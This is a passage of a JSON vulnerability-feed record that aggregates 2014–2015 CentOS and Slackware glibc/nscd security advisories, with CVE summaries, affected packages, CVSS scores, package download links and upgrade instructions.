(BZ#1120490)\n\n* Previously, when using netgroups and the nscd daemon was set up to cache\nnetgroup information, the sudo utility denied access to valid users. The bug in\nnscd has been fixed, and sudo now works in netgroups as\nexpected. (BZ#1080766)\n\nUsers of glibc are advised to upgrade to these updated packages, which fix these\nissues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2015-March/001556.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-static\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-0327.html", "modified": "2015-03-17T13:28:04", "published": "2015-03-17T13:28:04", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2015-March/001556.html", "id": "CESA-2015:0327", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:34:05", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2015:0016\n\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name Server\nCaching Daemon (nscd) used by multiple programs on the system. Without\nthese libraries, the Linux system cannot function correctly.\n\nAn out-of-bounds read flaw was found in the way glibc's iconv() function\nconverted certain encoded data to UTF-8. An attacker able to make an\napplication call the iconv() function with a specially crafted argument\ncould use this flaw to crash that application. (CVE-2014-6040)\n\nIt was found that the wordexp() function would perform command substitution\neven when the WRDE_NOCMD flag was specified. 
An attacker able to provide\nspecially crafted input to an application using the wordexp() function, and\nnot sanitizing the input correctly, could potentially use this flaw to\nexecute arbitrary commands with the credentials of the user running that\napplication. (CVE-2014-7817)\n\nThe CVE-2014-7817 issue was discovered by Tim Waugh of the Red Hat\nDeveloper Experience Team.\n\nThis update also fixes the following bugs:\n\n* Previously, when an address lookup using the getaddrinfo() function for\nthe AF_UNSPEC value was performed on a defective DNS server, the server in\nsome cases responded with a valid response for the A record, but a referral\nresponse for the AAAA record, which resulted in a lookup failure. A prior\nupdate was implemented for getaddrinfo() to return the valid response, but\nit contained a typographical error, due to which the lookup could under\nsome circumstances still fail. This error has been corrected and\ngetaddrinfo() now returns a valid response in the described circumstances.\n(BZ#1172023)\n\n* An error in the dlopen() library function previously caused recursive\ncalls to dlopen() to terminate unexpectedly or to abort with a library\nassertion. This error has been fixed and recursive calls to dlopen() no\nlonger crash or abort. 
(BZ#1173469)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-January/020863.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-static\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-0016.html", "modified": "2015-01-07T22:45:41", "published": "2015-01-07T22:45:41", "href": "http://lists.centos.org/pipermail/centos-announce/2015-January/020863.html", "id": "CESA-2015:0016", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:34:21", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2014:1110\n\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn off-by-one heap-based buffer overflow flaw was found in glibc's internal\n__gconv_translit_find() function. An attacker able to make an application\ncall the iconv_open() function with a specially crafted argument could\npossibly use this flaw to execute arbitrary code with the privileges of\nthat application. (CVE-2014-5119)\n\nA directory traversal flaw was found in the way glibc loaded locale files.\nAn attacker able to make an application use a specially crafted locale name\nvalue (for example, specified in an LC_* environment variable) could\npossibly use this flaw to execute arbitrary code with the privileges of\nthat application. 
(CVE-2014-0475)\n\nRed Hat would like to thank Stephane Chazelas for reporting CVE-2014-0475.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-August/020518.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-August/020519.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-August/020520.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-static\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-1110.html", "modified": "2014-08-29T21:03:35", "published": "2014-08-29T20:28:37", "href": "http://lists.centos.org/pipermail/centos-announce/2014-August/020518.html", "id": "CESA-2014:1110", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2019-05-30T07:37:12", "bulletinFamily": "unix", "description": "New glibc packages are available for Slackware 14.1 and -current to fix\nsecurity issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/glibc-2.17-i486-8_slack14.1.txz: Rebuilt.\n This update fixes several security issues, and adds an extra security\n hardening patch from Florian Weimer. 
Thanks to mancha for help with\n tracking and backporting patches.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4424\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4412\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4237\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4788\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4458\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4043\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0475\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5119\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6040\n (* Security fix *)\npatches/packages/glibc-i18n-2.17-i486-8_slack14.1.txz: Rebuilt.\npatches/packages/glibc-profile-2.17-i486-8_slack14.1.txz: Rebuilt.\npatches/packages/glibc-solibs-2.17-i486-8_slack14.1.txz: Rebuilt.\npatches/packages/glibc-zoneinfo-2014i-noarch-1_slack14.1.txz: Upgraded.\n Upgraded to tzcode2014i and tzdata2014i.\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-2.17-i486-8_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-i18n-2.17-i486-8_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-profile-2.17-i486-8_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-solibs-2.17-i486-8_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-zoneinfo-2014i-noarch-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-2.17-x86_64-8_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-i18n-2.17-x86_64-8_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-profile-2.17-x86_64-8_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-solibs-2.17-x86_64-8_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-zoneinfo-2014i-noarch-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/glibc-solibs-2.20-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/glibc-zoneinfo-2014i-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-2.20-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-i18n-2.20-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-profile-2.20-i486-1.txz\n\nUpdated packages for Slackware x86_64 
-current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/glibc-solibs-2.20-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/glibc-zoneinfo-2014i-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-2.20-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-i18n-2.20-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-profile-2.20-x86_64-1.txz\n\n\nMD5 signatures:\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg glibc-*.txz", "modified": "2014-10-23T22:36:04", "published": "2014-10-23T22:36:04", "id": "SSA-2014-296-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.647059", "title": "glibc", "type": "slackware", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}